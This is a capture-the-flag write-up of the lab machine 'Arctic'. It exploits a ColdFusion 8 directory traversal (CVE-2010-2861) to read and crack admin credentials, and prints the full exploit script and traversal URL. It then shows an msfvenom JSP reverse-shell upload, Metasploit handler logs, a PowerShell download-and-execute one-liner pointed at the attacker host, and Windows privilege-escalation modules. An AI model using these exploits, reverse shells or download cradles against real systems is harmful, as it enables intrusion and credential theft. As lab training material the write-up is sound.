10.10.10.11 - Arctic - LFI, Win2008 Priv Esc

ColdFusion JSP Shell Upload/MS10-092/MS16-014

Summary:

vulnerable software : CFIDE, POC system vulnerable : 10.10.10.11:8500 vulnerability explanation :Adobe ColdFusion Unspecified Directory Traversal Vulnerability severity : critical

Enumeration:

Command run:

nmap 10.10.10.11 -sV -sC

Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-30 07:47 GMT
Nmap scan report for 10.10.10.11
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Directories Enumeration:

Adobe ColdFusion Version 8 administrative panel at http://10.10.10.11:8500/CFIDE/administrator/.

Details of Adobe ColdFusion - Directory Traversal, 14641.py.

└──╼ $cat /usr/share/exploitdb/exploits/multiple/remote/14641.py
# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"
#!/usr/bin/python
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
# leo 13.08.2010
import sys
import socket
import re
# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm", "/CFIDE/administrator/enter.cfm")
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
locale=%%00%s%%00a"""
def main():
if len(sys.argv) != 4:
print "usage: %s <host> <port> <file_path>" % sys.argv[0]
print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
print "if successful, the file will be printed"
return
host = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
for f in filenames:
print "------------------------------"
print "trying", f
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
s.send(post % (f, host, len(path) + 14, path))
buf = ""
while 1:
buf_s = s.recv(1024)
if len(buf_s) == 0:
break
buf += buf_s
m = re.search('<title>(.*)</title>', buf, re.S)
if m != None:
title = m.groups(0)[0]
print "title from server in %s:" % f
print "------------------------------"
print m.groups(0)[0]
print "------------------------------"
if __name__ == '__main__':

We use LFI Vulnerability in http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en to retrieve the credentials:

Thanks to LFI vulnerability we managed to extract the hashed password and username to the login panel:

Password hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 is happyday.

Once logged in, locate schedule task and add the following routine:

File path is: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Shell built with:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444-f raw > shell.jsp

Upon execution of http://10.10.10.11:8500/CFIDE/shell.jsp, we get a reverse shell:

User flag:

C:\Users\tolis\Desktop>more user.txt
more user.txt
02650d3a69a70780c302e146a6cb96f3

Alternatively we can catch out reverse shell with a meterpreter:

msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.20:4444
msf5 exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler java/jsp_shell_reverse_tcp tcp://10.10.14.20:4444
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.11:49483) at 2019-01-31 02:22:25 +0000

Our current payload does not contain meterpreter, we can correct that with a web_delivery module:

msf5 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4455 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.20:4455
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/YVCJiGqyEy7pQbC
[*] Local IP: http://10.8.234.17:8080/YVCJiGqyEy7pQbC
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://10.10.14.20:8080/YVCJiGqyEy7pQbC');
[*] 10.10.10.11 web_delivery - Delivering Payload
[*] Sending stage (206403 bytes) to 10.10.10.11
[*] Meterpreter session 2 opened (10.10.14.20:4455 -> 10.10.10.11:49582) at 2019-01-31 02:35:36 +0000
msf5 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation... 10.10.14.20:4444 -> 10.10.10.11:49560 (10.10.10.11)
2 meterpreter x64/windows ARCTIC\tolis @ ARCTIC

Privilege Escalation:

We try the first exploit on the list and ms10_092_schelevator works beautifully on 10.10.10.11.

Note to self: research how recent CVE-2018-8440 can be used to exploit this and other versions of Windows.

Alternatively use:

ms16_014_wmi_recv-notif

Both exploits are providing administrative access to this Windows 2008 machine: